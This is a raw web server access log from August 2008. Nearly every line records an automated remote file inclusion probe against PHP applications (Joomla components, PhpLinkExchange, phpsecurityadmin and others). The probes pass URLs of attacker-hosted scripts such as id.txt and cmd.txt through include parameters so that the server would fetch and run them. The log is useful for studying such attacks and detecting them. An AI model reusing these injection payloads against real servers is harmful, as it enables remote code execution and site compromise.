81.247.120.95 - - [28/Aug/2008:06:29:38 -0700] "GET /images/covers/films/stanleykubrick.jpg HTTP/1.1" 404 275 "http://shinebox.web-log.nl/shinebox/rating_08_10/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)" "www.realityfilm.com"
218.188.197.136 - - [28/Aug/2008:06:29:46 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
218.188.197.136 - - [28/Aug/2008:06:29:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
207.210.89.58 - - [28/Aug/2008:06:29:47 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://forum.dropball.ru/ecb832689873cfafb30938baa4991b8a/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
207.210.89.58 - - [28/Aug/2008:06:29:47 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://forum.dropball.ru/ecb832689873cfafb30938baa4991b8a/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
207.210.89.58 - - [28/Aug/2008:06:29:48 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://forum.dropball.ru/ecb832689873cfafb30938baa4991b8a/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
217.198.149.178 - - [28/Aug/2008:06:29:54 -0700] "GET /logs/access_080814.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.realityfilm.com"
217.198.149.178 - - [28/Aug/2008:06:29:54 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.realityfilm.com"
78.129.138.76 - - [28/Aug/2008:06:30:12 -0700] "GET /errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
78.129.138.76 - - [28/Aug/2008:06:30:12 -0700] "GET /logs/access_080731.log/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
78.129.138.76 - - [28/Aug/2008:06:30:12 -0700] "GET /logs/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
222.122.161.78 - - [28/Aug/2008:06:30:21 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.realityfilm.com"
222.122.161.78 - - [28/Aug/2008:06:30:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.realityfilm.com"
222.122.161.78 - - [28/Aug/2008:06:30:21 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:31:40 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:31:41 -0700] "GET /logs/access_080809.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:31:41 -0700] "GET /logs/access_080809.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
220.73.137.93 - - [28/Aug/2008:06:31:54 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
72.14.199.38 - - [28/Aug/2008:06:32:05 -0700] "GET /blog/feed/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=14723575622525845474)" "realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:32:10 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:32:10 -0700] "GET /logs/access_080809.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:32:10 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:32:43 -0700] "GET /logs/access_080814.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:32:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:32:43 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:32:46 -0700] "GET /logs/access_080814.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:32:46 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.realityfilm.com"
67.228.116.50 - - [28/Aug/2008:06:32:49 -0700] "GET /administrator/components/com_extcalendar/lib/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.realityfilm.com"
67.228.116.50 - - [28/Aug/2008:06:32:49 -0700] "GET /logs/access_080805.log/administrator/components/com_extcalendar/lib/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.realityfilm.com"
67.228.116.50 - - [28/Aug/2008:06:32:49 -0700] "GET /logs/administrator/components/com_extcalendar/lib/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:33:10 -0700] "GET /errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:33:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:33:24 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.realityfilm.com"
217.198.149.178 - - [28/Aug/2008:06:33:30 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
78.129.138.76 - - [28/Aug/2008:06:33:31 -0700] "GET /logs/access_080802.log/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
87.101.4.49 - - [28/Aug/2008:06:33:53 -0700] "GET /index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
87.101.4.49 - - [28/Aug/2008:06:33:53 -0700] "GET /logs/access_080805.log/index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
87.101.4.49 - - [28/Aug/2008:06:33:53 -0700] "GET /logs/index.php?site=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
67.228.116.50 - - [28/Aug/2008:06:33:54 -0700] "GET /logs/access_080731.log/administrator/components/com_extcalendar/lib/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.realityfilm.com"
218.38.54.160 - - [28/Aug/2008:06:33:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:34:39 -0700] "GET /logs/access_080814.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:34:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:34:43 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:34:53 -0700] "GET /logs/access_080805.log/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:34:54 -0700] "GET /errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:34:55 -0700] "GET /logs/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
64.185.237.77 - - [28/Aug/2008:06:34:56 -0700] "GET /logs/access_080805.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.realityfilm.com"
64.185.237.77 - - [28/Aug/2008:06:34:56 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:35:01 -0700] "GET /logs/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:35:01 -0700] "GET /myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:35:01 -0700] "GET /logs/access_080805.log/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:35:01 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:35:21 -0700] "GET /logs/access_080804.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:35:21 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:35:21 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
12.196.98.16 - - [28/Aug/2008:06:35:33 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:35:40 -0700] "GET /logs/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:35:41 -0700] "GET /errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.68.51.152 - - [28/Aug/2008:06:35:56 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.realityfilm.com"
194.97.107.208 - - [28/Aug/2008:06:36:03 -0700] "GET /logs/access_080814.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
64.185.237.77 - - [28/Aug/2008:06:36:15 -0700] "GET /logs/access_080731.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:36:43 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:36:43 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:36:54 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:36:54 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:36:54 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:36:59 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:37:40 -0700] "GET /logs/access_080804.log%20/myevent.php?myevent_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:37:40 -0700] "GET /myevent.php?myevent_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
202.43.35.133 - - [28/Aug/2008:06:37:40 -0700] "GET /logs/myevent.php?myevent_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:38:03 -0700] "GET /logs/access_080606.log/?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:38:03 -0700] "GET /?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:38:04 -0700] "GET /logs/?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.812" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:38:08 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:38:08 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:38:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:38:08 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.realityfilm.com"
70.87.240.50 - - [28/Aug/2008:06:38:41 -0700] "GET /logs/access_080606.log/index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
70.87.240.50 - - [28/Aug/2008:06:38:41 -0700] "GET /index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
70.87.240.50 - - [28/Aug/2008:06:38:41 -0700] "GET /logs/index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:39:19 -0700] "GET /logs/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:39:21 -0700] "GET /errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
83.64.132.254 - - [28/Aug/2008:06:39:31 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bestofipl.com/backup/IDID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:39:50 -0700] "GET /logs/access_080731.log//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:39:50 -0700] "GET //appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:39:50 -0700] "GET /logs//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:39:57 -0700] "GET /logs//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:39:57 -0700] "GET //appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:40:10 -0700] "GET /logs/access_080808.log//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:40:10 -0700] "GET //appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "realityfilm.com"
216.55.159.47 - - [28/Aug/2008:06:40:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:40:57 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:41:28 -0700] "GET /logs/access_080606.log/index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:41:28 -0700] "GET /index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:41:28 -0700] "GET /logs/index.php?custompluginfile[]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:41:42 -0700] "GET /logs/access_080606.log/?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:41:42 -0700] "GET /?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.realityfilm.com"
64.22.89.194 - - [28/Aug/2008:06:41:42 -0700] "GET /logs/?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.812" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:42:22 -0700] "GET /logs/access_080606.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:42:22 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:42:22 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
66.98.216.89 - - [28/Aug/2008:06:42:35 -0700] "GET /logs/access_080731.log//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
66.98.216.89 - - [28/Aug/2008:06:42:46 -0700] "GET //appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
66.98.216.89 - - [28/Aug/2008:06:42:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
67.212.186.26 - - [28/Aug/2008:06:42:48 -0700] "GET /logs/access_080805.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/voldemort.tondano/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
67.212.186.26 - - [28/Aug/2008:06:42:48 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/voldemort.tondano/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
67.212.186.26 - - [28/Aug/2008:06:42:48 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/voldemort.tondano/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:43:14 -0700] "GET /logs/access_080808.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:43:15 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:43:15 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "realityfilm.com"
194.97.107.208 - - [28/Aug/2008:06:43:17 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.realityfilm.com"
66.98.216.89 - - [28/Aug/2008:06:43:18 -0700] "GET /logs//appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
66.98.216.89 - - [28/Aug/2008:06:43:19 -0700] "GET //appserv/main.php?appserv_root=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.realityfilm.com"
